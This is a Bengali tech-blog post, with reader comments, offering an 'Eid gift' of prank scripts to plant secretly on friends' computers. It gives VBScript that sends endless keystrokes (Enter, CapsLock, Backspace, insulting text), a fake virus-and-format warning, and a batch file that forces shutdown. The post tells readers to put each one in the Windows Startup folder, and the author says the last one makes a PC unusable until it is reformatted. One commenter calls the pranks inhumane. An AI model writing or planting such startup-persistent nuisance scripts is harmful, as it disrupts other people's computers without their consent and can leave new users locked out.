নিজের বানানো কিছু কোড দিয়ে চমকে দিন বন্ধুদের। ঈদ উপহার!!!

সবাইকে ঈদের শুভেচ্ছা। ঈদ কেমন কেটেছে সবার। নিশ্চয়ই অনেক ভাল। আমারটা ভালো হয় নাই। কালকে অনেক টিউনার আপনাদের ঈদ উপহার দিয়েছে। আমি দিতে পারি নাই। তাই একটা লেট উপহার নিয়ে আমিও হাজির হলাম আজ।
আমারটা অবশ্য এই সময়ের জন্য বেশ কার্যকরী। কেননা বন্ধুরা সবাই বাড়ি থেকে এসে দাওয়াত দিবে আপনাকে। ঈদের সময় মজা না করে শুধু খেয়েই চলে আসবেন তা তো হয়না। তাই কোন এক ফাকে বন্ধুর কম্পিউটার হাতে পেলে। দেখিয়ে দিন আপনার তেলেসমাতি।
আজ আমি আপনাদের কয়েকটা ভিবি স্ক্রিপ্টের সাথে পরিচয় করিয়ে দেব। একটা ভয়ানক অন্যগুলো মজার।

১. প্রথমেই আসি সহজ সরল একটা প্রোগ্রামে। আপনার কোন বন্ধুর হয়তো টাইপিং অনেক স্লো। তার ঘারে একটা ভূত চাপিয়ে দিয়ে আসুন। কিছুদিনের মধ্যেই তার টাইপিং স্পিড বোল্টকেও হার মানাবে।
-নোটপ্যাড খুলুন আর নিচের কোড গুলো লিখুনঃ

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "O"
WScript.Sleep 500
WshShell.SendKeys " RE "
WScript.Sleep 500
WshShell.SendKeys ", Gha"
WScript.Sleep 500
WshShell.SendKeys "da"
WScript.Sleep 500
WshShell.SendKeys " re!"
WScript.Sleep 500
WshShell.SendKeys "hath"
WScript.Sleep 500
WshShell.SendKeys " cala."
WScript.Sleep 500
WshShell.SendKeys " Aro"
WScript.Sleep 500
WshShell.SendKeys "Tara"
WScript.Sleep 500
WshShell.SendKeys "tari"
WScript.Sleep 500
WshShell.SendKeys " type"
WScript.Sleep 500
WshShell.SendKeys " k"
WScript.Sleep 500
WshShell.SendKeys "or"

এরপর এটি আপনার নামে vbs ফরম্যাটে সেভ করুন(maakn.vbs)। তারপর ফাইলটি স্টার্ট আপে (C:\Documents and Settings\YOUR USER NAME\Start Menu\Programs\Startup এ যান।) রেখে আসুন। এরপর আপনার বন্ধু প্রতিবার পিসি অন করে প্রথম বার টাইপ করার সময় দেখবে মজা।

২. এবার শাস্তি দিন আপনার ভীতু বন্ধুটিকে। নিচের কোড লিখুনঃ

Msgbox "Your computer has been infected by a

virus",16,"Warning !"
dim x,yes,no
x=Msgbox("Virus has infected hard drive (C:).

Deletion of the virus will require complete

formatting of hard drive (C:). Would you like to

format hard drive (C:) ?",52,"Warning !")
if x=6 then
dim box
box=Msgbox("Hard drive (C:) formatting complete. In

order to function correctly your computer must

restart, would you like to restart now

?",36,"Formatting has been completed")
if box=6 then
Msgbox "Fatal error, code 08x48631643.B-

7",16,"ERROR"
Msgbox "You Fool! Dont you know me? I'm your best friend.
Are you scared. Dont worry. Nothing happend my friend.
ha ha",64,"Made by Maakn"
end if
if box=7 then
Msgbox "Fatal error, code 08x48631643.B-

7",16,"ERROR"
Msgbox "You Fool! Dont you know me? I'm your best friend.
Are you scared. Dont worry. Nothing happend my friend.
ha ha",64,"Made by Maakn"
end if
end if
if x=7 then
Msgbox "Fatal error, code 08x48631643.B-

7",16,"ERROR"
Msgbox "You Fool! Dont you know me? I'm your best friend.
Are you scared. Dont worry. Nothing happend my friend.
ha ha",64,"Made by Maakn"
end if

যথারীতি সেভ করে নির্দিষ্ট যাইয়গায় রেখে আসুন। তারপর মজা.....মজা.....

৩.  প্রথমটার মত আরেকটা মজা এবার। নিচের কোডটি টাইপ করুনঃ

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

যথারীতি সেভ করে নির্দিষ্ট যায়গায় রেখে আসুন। তারপর মজা.....মজা.....আপনার বন্ধুটি টাইপিং ছেড়ে দিবে...তবু ভুত ছাড়বে না...হা হা হা

এরকম আরো কয়েকটা মজার কোডঃ

৪.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
ক্রমাগত এন্টার চাপায় এর কাজ...

৫.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
ক্রমাগত ক্যপস লক চাপবে

৬.
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
ক্রমাগত ব্যাকস্পেস চাপবে

৭. এবার একটা ভয়ংকর কোড দিই। সাবধান একবার স্টার্টআপে রেখে আসলে ফরম্যাট ছাড়া গতি নাই কিন্তু নতুনদের জন্য মানা!!!!!!

@echo off
msg * I don't like you
shutdown -c "Error! My name is MAAKN!" -s

ও এটা আবার .bat. ফরম্যাট এ সেভ করতে হবে(maakn.bat)
হা হা হা হা

পুনশ্চঃ এবার ঈদে যারা যারা ঘর(ট....) থেকে বের হতে পারবেন এই মজা শুধু তাদের জন্য প্রযোজ্য। হা হা হা।
ঈদ মোবারক।

Level 0

আমি মাখন। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 14 বছর যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 37 টি টিউন ও 961 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

আমি একটা ফাজিল। সবসময় ফাজলামো করতে ভালোবাসি। আর আমি প্রায় সবসময় হাসিখুশি থাকি। আমাদের সমাজে সবার এত বেশি দুঃখ যে কাওকে একটু হাসতে দেখলেই মনে করে তার মাথার স্ক্রু কয়েকটা পড়ে গেছে। আমি তাদের সাথে একমত, আমার শরীরের যে অংশ আমাকে হাসতে দেবে না, আমার তার দরকারও নাই।


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

কম্পুটারই চালাইতে পারি না । তারপর ও প্রিয়তে । কারণ এসবে আগ্রহ আছে 😀

    আগ্রহ থাকা ভালো। কিন্তু “এসবে আগ্রহ” মানে কি? এসব মানে যদি ধ্বংস করা হয় তবে আমি বলব দরকার নাই। কারন রাসেদ ভাই বলেছেন নিচে,”মানুষকে কষ্ট দিয়ে মজা নেয়াটা মনে হয় খুবই অমানবিক।” আরেকটা কথা ভাঙ্গার আগে বানাতে শিখতে হয়।

ধন্যবাদ.
আরে ভাই এসবের কি দরকার. দিলেন যখন নিলাম প্রিয়তে.

ধন্যবাদ.
আরে ভাই এসবের কি দরকার. দিলেন যখন নিলাম প্রিয়তে.
পাওয়ার পয়েন্ট বুকটা লাগবে পারলে দিয়েন.বাংলা PDF

    দুঃখিত, আমার কাছে কম্পিউটারের প্রায় শ খানেক বই আছে। কিন্তু একটার আগেও ই নাই। সেগুলো লাগলে বলবেন আমিই সরাসরি দিয়ে আসব।(সাথে খেয়েও)। হা হ হা Sorry Again.

এই রকম আরোও টিউন আশাকরছি আপনার কাছ থেকে। আপনাকে অসংখ্য ধন্যবাদ।

    আপনাকেও ধন্যবাদ

এরপর এটি আপনার নামে vbs ফরম্যাটে সেভ করুন(maakn.vbs)। তারপর ফাইলটি স্টার্ট আপে রেখে আসুন। এরপর আপনার বন্ধু প্রতিবার পিসি অন করে প্রথম বার টাইপ করার সময় দেখবে মজা।
start up এর ব্যাপার টি একটু বুঝিয়ে বলবেন?

    C:\Documents and Settings\YOUR USER NAME\Start Menu\Programs\Startup এ যান। আপনার তৈরি ফাইলগুলো রাখুন।

আপনাকে অনেক ধন্যবাদ আমার উপকারে আসবে.
ভাই আপনাকে একটু কষ্ট দিতেছি আমার আপডেট নাটকের সাইট দিতে পারবেন? আমার খুব দরকার.
দরেন ৫/৭ আগে বের হয়েছে এমন.

    আপনি কি বাংলা নাটক ডাউনলোড করা যায় এমন সাইটের কথা বলছেন তাহলে এখানে দেখতে পারেন http://www.amarnatok.com

ভাই কয়েকটা কথা না বলে পারলাম না।
মানুষকে কষ্ট দিয়ে মজা নেয়াটা মনে হয় খুবই অমানবিক। আপনার এই স্ক্রীপ্টের পাল্লায় যদি কোন নতুন কম্পিউটার ব্যবহারকারী পড়ে তাহলে তার অবস্থা কি হবে একবার ভেবে দেখেছেন?

আরেকটা প্রবনতা লক্ষ্য করছি কিছুদিন থেকে। সবকিছুকে হ্যাকিং, ভাইরাসের কাতারে ফেলে দিচ্ছে অনেকে। দেখি এসব ব্যাপারে উইকিপিডিয়া কি বলেঃ
A computer virus is a computer program that can copy itself and infect a computer.
A hacker is a person who breaks into computers and computer networks.

আমার কথায় কষ্ট পেয়ে থাকলে দুঃখিত।

    আমি কি বলব আপনাকে আপনিই মাইন্ড করলেন মনে হল। ভাইয়া আমি হ্যাকার-ভাইরাস এগুলোর সংজ্ঞা জানি।
    Hacker (hobbyist), to heavily modify the software or hardware of one’s own computer system
    (http://en.wikipedia.org/wiki/Hacking)
    আর কোডগুলোকে একটু ঘষা-মাজা করলেই এরাও ক্লোন তৈরি করতে পারবে।
    আমি ফাজিল মাইন্ড করি না। আপনি করলে সরি…। 🙂
    আর এগুলো (একটা ছাড়া) তেমন কোন সমস্যা হবে না।

    শিরোনামটা পালটে দিলাম… 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 🙁 (এমনিতেই পেট বাবাজী নারাজ আর কাউকে নারাজ করতে চাই না।)

    হাহা। আমি কিন্তু কিচ্ছু মনে করি নি।
    আর আপনার পেটের জন্য শুভকামনা 🙂

Level 0

brother,,,amar frnds jodi tar pc purber obostay ferea patea chay taholea ki korbo???….ami ki (.vsb) file ta delete korbo….

    বন্ধ করার জন্য টাক্স ম্যানাজার খুলে(ctrl+Alt+Del) process এ যান আর wscript.exe বন্ধ করে দিন। Startup এ এর কোন একটা রাখলে সেখান থেকে মুছে ফেললেই হবে।(১-৬)

আমি বাংলা নাটোক এর কথা বলেছি.
ভাই আমি http://www.amarnatok.com কথা বলিনায়. এটাতে টিভি চ্যানেলে প্রচার হবার পরে নাটক ছাড়ে.
আমি বলছি কেউ দিতে পারবে কি এমন একটি Address যেটাতে (( ৫/৭ )) দিনের ভিতর বেরিয়েছে নতুন নাটক..
অনেক ধন্যবাদ..

আমি বাংলা নাটোক এর কথা বলেছি.
ভাই আমি http://www.amarnatok.com কথা বলিনায়. এটাতে টিভি চ্যানেলে প্রচার হবার পরে নাটক ছাড়ে.
আমি বলছি কেউ দিতে পারবে কি এমন একটি Address যেটাতে (( ৫/৭ )) দিনের ভিতর বেরিয়েছে নতুন নাটক..
অনেক ধন্যবাদ..
[email protected]

মাখন ভাই এর tune মানে jotilssssssssssssssssssssssssssssssssss.

    আপনাকে অনেক শুভেচ্ছা। কষ্ট করে কমেন্ট করার জন্য।

MAKHAN VAI,
OOOOnek dhonnobad ekti excellent tune gift deoyar jonno. Asha kori erokom tune aro pabo. vai………………..kintu……………………
ei tuner 1, 2,3 & 7 nombor code guli jodi ami try kori tahole result ki pabo ektu bistarito bolle amar(moto sholpo ganir) jonno khubi upokar hoto.
Bishesh kore 7 no. tar karon result na jene agei try korle jodi kono accident hoy….tai………………………

    রাজ ভাই, ১,২,৩ এর মজা আপনি নিজে ট্রাই করুন। কোডে ডাবল ক্লিক করে নোটপ্যাডে কিছু লিখুন।
    আর বন্ধ করার জন্য টাক্স ম্যানাজার খুলে(ctrl+Alt+Del) process এ যান আর wscript.exe বন্ধ করে দিন। Startup এ এর কোন একটা রাখলে সেখান থেকে মুছে ফেললেই হবে।
    আর ৭ নং আসলেই ভয়ানক। সেটা চালু করলে আপনার পিসি অটোমেটিক বন্ধ হয়ে যাবে। কিছু করার নাই। এরপর আবার চালু করুন। আর যদি ভুলে Startup এ রাখেন তাহলে যে খবরটা আছে সেটা টিউনেই লিখে দিয়েছি। ধন্যবাদ।

মাক্খন ভাই যে…। মজার পোস্ট দিছেন দেখি। আমার কাছে আরো অনেক গুলো আছে লাগলে বইলেন এক সাথে সব দিয়া দিবেন পোস্ট আপডেট করে। হিহি।
ভালো থাকেন

ধন্যবাদ।জাউরামি করার জন্য যথেষ্ট… 🙂

kaje lagbe! thank’s